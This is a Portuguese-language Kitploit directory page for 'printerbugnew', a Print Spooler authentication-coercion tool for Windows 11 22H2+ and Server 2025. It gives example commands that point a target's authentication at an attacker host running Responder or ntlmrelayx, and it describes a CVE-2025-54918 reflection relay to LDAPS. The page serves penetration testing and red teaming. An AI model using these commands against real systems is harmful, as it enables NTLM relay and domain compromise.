Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Ferramentas/GitHubGitHub/decoder-it/printerbugnew
Escalada de PrivilégiosAnálise de VulnerabilidadesExploraçãoMovimento LateralTestes de PenetraçãoComando e ControleAutenticaçãoRed Teaming
GitHubdecoder-it/printerbugnew

printerbugnew

A versão somente DCERPC do printerbug.py

Ver Repositório
233262há 10 mesesRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Gatilho de Spooler de Impressão via RPC Puro sobre TCP

Para Windows 11 22H2+ / Windows Server 2025

Uso

root@kitploit:~
printerbugnew.py <target_host> [username] [password] [domain] [attacker_host] [tcp_port]

Exemplos

Conexão anônima

root@kitploit:~
printerbugnew.py 192.168.1.100

Com credenciais

root@kitploit:~
printerbugnew.py 192.168.1.100 admin Password123 DOMAIN

Acionar backconnect para um host diferente (atacante)

root@kitploit:~
printerbugnew.py 192.168.1.100 admin Password123 DOMAIN 192.168.1.50

Usar porta RPC específica

root@kitploit:~
printerbugnew.py 192.168.1.100 admin Password123 DOMAIN 192.168.1.50 49152

Notas

  • O alvo deve ser Windows 11 22H2+ ou Server 2025 (RPC sobre TCP por padrão)
  • Para versões mais antigas, o spoolss usa RPC sobre Named Pipes (SMB)
  • Garanta que as portas 135 e as portas RPC dinâmicas (49152-65535) estejam abertas
  • Inicie o Responder ou o ntlmrelayx no attacker_host para capturar a autenticação
  • O Kerberos falha neste caso devido a um SPN inválido do spooler, forçando o fallback para NTLM.
  • Encontre a porta RPC/TCP do spooler alvo consultando o Endpoint Mapper (EPM) do alvo em TCP/135 pela interface UUID 12345678-1234-abcd-ef00-0123456789ab. Você pode usar rpcdump.py, PortQry ou qualquer ferramenta que preferir - ou apenas implementar a consulta ao EPM diretamente neste código ;)
  • Baseado em https://github.com/dirkjanm/krbrelayx/blob/master/printerbug.py

    imagem

    imagem

    imagem

Atualização para CVE-2025-54918

Este exploit via reflection funciona apenas no W2025 com o printerbug "novo" (DCERPC em vez de Named Pipes). Você precisará modificar o ntlmrelayx em alguns pontos para que ele funcione. Depois disso, você pode acionar remotamente o printer bug em um DC W2025 e refletir a autenticação via LDAPS(!), mesmo se Channel Bindings estiver REQUERIDO

ldaprelayclient.py:
imagem
rpcrelayserver.py
imagem

e faça o relay ;)
imagem


A vulnerabilidade foi corrigida no Patch Tuesday de setembro de 2025: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-54918

A correção garante que o MIC seja sempre calculado, mesmo quando a mensagem Type 3 está vazia.

Agradecimentos ao autor deste CVE pela dica valiosa :)

Baixar ferramenta